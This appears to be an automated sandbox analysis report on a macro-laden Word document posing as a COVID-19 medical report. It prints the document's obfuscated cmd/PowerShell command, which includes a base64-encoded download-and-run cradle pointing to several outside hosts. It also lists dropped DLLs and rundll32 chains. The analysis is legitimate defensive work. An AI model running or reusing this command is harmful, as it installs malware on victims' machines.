cAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: XP-9743 Medical report COVID-19.doc Initial sample: OLE summary subject = Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: XP-9743 Medical report COVID-19.doc Stream path 'Macros/VBA/Gx8fznt8p0b' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gx8fznt8p0b Name: Gx8fznt8p0b
Document contains an embedded VBA with many randomly named variables
Source: XP-9743 Medical report COVID-19.doc Stream path 'Macros/VBA/Gx8fznt8p0b' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE Jump to behavior
PE file contains an invalid checksum
Source: S93E.dll.5.dr Static PE information: real checksum: 0x60901 should be: 0x5c940
PE file contains sections with non-standard names
Source: S93E.dll.5.dr Static PE information: section name: .text4
Source: S93E.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001698 push ebp; retf 7_2_1000169A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001113 push esp; ret 7_2_10001131
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0019E8D0 push edx; ret 7_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018388E push esi; retf 7_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183A42 push ebx; retf 7_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00183272 push edi; ret 7_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00184BAB push ebp; iretd 7_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001823D7 push cs; iretd 7_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0019E8D0 push edx; ret 8_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0018388E push esi; retf 8_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00183A42 push ebx; retf 8_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00183272 push edi; ret 8_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00184BAB push ebp; iretd 8_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001823D7 push cs; iretd 8_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0019E8D0 push edx; ret 9_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018388E push esi; retf 9_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183A42 push ebx; retf 9_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183272 push edi; ret 9_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00184BAB push ebp; iretd 9_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001823D7 push cs; iretd 9_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0015E8D0 push edx; ret 10_2_0015E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0014388E push esi; retf 10_2_001438BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00143A42 push ebx; retf 10_2_00143A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00143272 push edi; ret 10_2_00143273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00144BAB push ebp; iretd 10_2_00144BB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001423D7 push cs; iretd 10_2_001423D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0019E8D0 push edx; ret 11_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0018388E push esi; retf 11_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00183A42 push ebx; retf 11_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00183272 push edi; ret 11_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00184BAB push ebp; iretd 11_2_00184BB9

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Giyrh\pugu.vsm Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
